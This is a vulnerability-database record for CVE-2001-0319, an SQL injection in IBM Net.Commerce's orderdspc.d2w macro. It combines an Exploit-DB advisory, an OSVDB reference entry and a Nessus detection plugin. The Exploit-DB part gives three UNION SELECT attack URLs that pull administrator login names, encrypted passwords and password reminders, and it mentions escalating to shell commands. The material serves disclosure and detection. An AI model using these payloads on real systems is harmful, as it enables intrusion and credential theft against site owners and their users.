ID CVE-2001-0319 Type cve Reporter NVD Modified 2017-10-09T21:29:40
Description
orderdspc.d2w macro in IBM Net.Commerce 3.x allows remote attackers to execute arbitrary SQL queries by inserting them into the order_rn option of the report capability.
{"exploitdb": [{"lastseen": "2016-02-02T14:39:01", "bulletinFamily": "exploit", "description": "IBM Net.Commerce 2.0/3.x/4.x orderdspc.d2w order_rn Option SQL Injection. CVE-2001-0319. Remote exploits for multiple platform", "modified": "2001-02-05T00:00:00", "published": "2001-02-05T00:00:00", "id": "EDB-ID:20618", "href": "https://www.exploit-db.com/exploits/20618/", "type": "exploitdb", "title": "IBM Net.Commerce 2.0/3.x/4.x orderdspc.d2w order_rn Option SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/2350/info\r\n\r\nIBM's Net.Commerce ecommerce platform supports macros which, by default, do not properly validate requests in user-supplied input. A thoughtfully-formed request to a vulnerable script can cause the server to disclose sensitive system information, including results of arbitrary queries to the Net.Commerce database. This can allow an attacker to obtain an elevation of privileges to that of the DB2INST1 account, and potentially issue arbitrary shell commands as the DB2INST1 user.\r\n\r\nIBM fixed the vulnerable macros they ship with the product in Net.Commerce Versions 3.2 and WebSphere Commerce Suite 4.1. Custom macros created by the user may be vulnerable to this type of attack. WebSphere Commerce Suite Version 5.1 is not vulnerable at all as it does not use Net.Data macros. \r\n\r\nTo obtain the administrator accounts use the following URL:\r\n\r\nhttp://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';\r\n\r\nTo obtain the encrypted passwords use the following URL:\r\n\r\nhttp://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';\r\n\r\nTo obtain the password reminders use the following URL:\r\nhttp://target/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';\r\n\r\n\"orderdspc.d2w\" is not the only vulnerable macro. It is just used as an example. Casting between different data-types is possible. Read the DB2 manual pages.\r\n\r\nIt may also be possible to query other databases. ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/20618/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSnort Signature ID: 1820\nISS X-Force ID: 6067\n[CVE-2001-0319](https://vulners.com/cve/CVE-2001-0319)\nBugtraq ID: 2350\n", "modified": "2001-02-05T00:00:00", "published": "2001-02-05T00:00:00", "id": "OSVDB:833", "href": "https://vulners.com/osvdb/OSVDB:833", "title": "IBM Net.Commerce orderdspc.d2w order_rn Option SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:07:44", "bulletinFamily": "scanner", "description": "The macro orderdspc.d2w in the remote IBM Net.Commerce 3x is vulnerable to a SQL injection attack via the 'order_rn' option.\n\nAn attacker may use it to abuse your database in many ways.", "modified": "2018-11-28T00:00:00", "id": "NETCOMMERCE_SQL.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11020", "published": "2002-06-08T00:00:00", "title": "IBM Net.Commerce orderdspc.d2w order_rn Option SQL Injection", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude( 'compat.inc' );\n\nif (description)\n{\n script_id(11020);\n script_version(\"1.27\");\n script_cve_id(\"CVE-2001-0319\");\n script_bugtraq_id(2350);\n\n script_name(english:\"IBM Net.Commerce orderdspc.d2w order_rn Option SQL Injection\");\n script_summary(english:\"Determine if the remote host is vulnerable to SQL injection\");\n\n script_set_attribute(\n attribute:'synopsis',\n value:'The remote service is prone to SQL injection.'\n );\n\n script_set_attribute(\n attribute:'description',\n value:\"The macro orderdspc.d2w in the remote IBM Net.Commerce 3x\nis vulnerable to a SQL injection attack via the 'order_rn'\noption.\n\nAn attacker may use it to abuse your database in many ways.\"\n );\n\n script_set_attribute(\n attribute:'solution',\n value: \"Upgrade to IBM WebSphere Commerce Suite version 5.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:W/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n # https://web.archive.org/web/20010420044017/http://archives.neohapsis.com/archives/bugtraq/2001-02/0072.html\n script_set_attribute(\n attribute:'see_also',\n value:'http://www.nessus.org/u?6bddc034'\n );\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/02/05\");\n script_cvs_date(\"Date: 2018/11/28 22:47:41\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:net.commerce\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n script_copyright(english:\"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencie(\"find_service1.nasl\", \"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/ibm-http\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nw = http_send_recv3(method:\"GET\", item:\"/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9';\", port:port, exit_on_fail:TRUE);\n\nres = strcat(w[0], w[1], '\\r\\n', w[2]);\n\nexpect1 = \"A database error occurred.\";\nexpect2 = \"SQL Error Code\";\nif((expect1 >< res) && (expect2 >< res))\n{\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
